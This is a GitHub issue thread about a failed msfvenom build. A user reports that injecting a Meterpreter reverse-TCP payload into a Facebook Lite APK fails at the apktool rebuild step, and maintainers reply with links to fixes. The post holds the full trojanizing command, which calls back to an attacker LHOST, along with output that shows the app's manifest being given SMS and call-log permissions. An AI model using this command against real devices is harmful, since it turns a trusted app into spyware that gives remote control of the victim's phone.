### ISSUE TITLE
Msfvenom payload: Unable to rebuild apk with apktool

### ISSUE THREAD

**Issue by Sp3cal** [rapid7/metasploit-framework#11549]
I'm using Ubuntu 18.04 64bit (Used the same code on kali linux 2019 but I have the same problem) on ORacle VB. When I use this command:

sudo msfvenom -x facebook.apk -p android/meterpreter/reverse_tcp LHOST=192.168.1.62 LPORT=4444 -o fbl.apk

I get this Error info:

**Using APK template: fb.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.facebook.lite.oyqxb
[*] Loading /tmp/d20190311-18825-1r7a6kd/original/smali/com/facebook/lite/ClientApplicationSplittedShell.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Rebuilding fb.apk with meterpreter injection as /tmp/d20190311-18825-1r7a6kd/output.apk
[-] I: Using Apktool 2.4.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
W: /tmp/d20190311-18825-1r7a6kd/original/AndroidManifest.xml:67: error: No resource identifier found for attribute 'appComponentFactory' in package 'android'
W: 
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_1835904678095835903.tmp, p, --forced-package-id, 127, --min-sdk-version, 14, --target-sdk-version, 26, --version-code, 144962314, --version-name, 137.0.0.7.106, --no-version-vectors, -F, /tmp/APKTOOL2281780524051253080.tmp, -0, xzs, -0, assets/secondary-program-dex-jars/secondary.dex.jar.xzs, -0, png, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/d20190311-18825-1r7a6kd/original/res, -M, /tmp/d20190311-18825-1r7a6kd/original/AndroidManifest.xml]
Error: Unable to rebuild apk with apktool
**

I have installed apktool, jarsigner and keytool.

Can anybody help me out?

**Comment by bcoles** [comment]
These may or may not help:

* https://github.com/rapid7/metasploit-framework/issues/11478#issuecomment-466925292
* https://github.com/rapid7/metasploit-framework/issues/11478#issuecomment-468422017

**Comment by Sp3cal** [comment]
> These may or may not help:
> 
>     * [#11478 (comment)](https://github.com/rapid7/metasploit-framework/issues/11478#issuecomment-466925292)
> 
>     * [#11478 (comment)](https://github.com/rapid7/metasploit-framework/issues/11478#issuecomment-468422017)

I'll try it and I'll let you know, thanks.

**Comment by Abdulmanan0315** [comment]
https://stackoverflow.com/questions/60250263/malformed-string-number-version-2-4-0-when-msfvenom-x/61420064#61420064

**Comment by gwillcox-r7** [comment]
@Abdulmanan0315 Can you provide any context to this link?

**Comment by Abdulmanan0315** [comment]
@gwillcox-r7 Provided. Thanks for reminding 👍

**Comment by gwillcox-r7** [comment]
Closing this issue as it was from March 11th and I have yet to see a response from @Sp3cal as to whether or not his issue was fixed. Futhermore @Abdulmanan0315 also provided an alternative solution. @Sp3cal if you are still having issues, please feel free to reopen this issue.
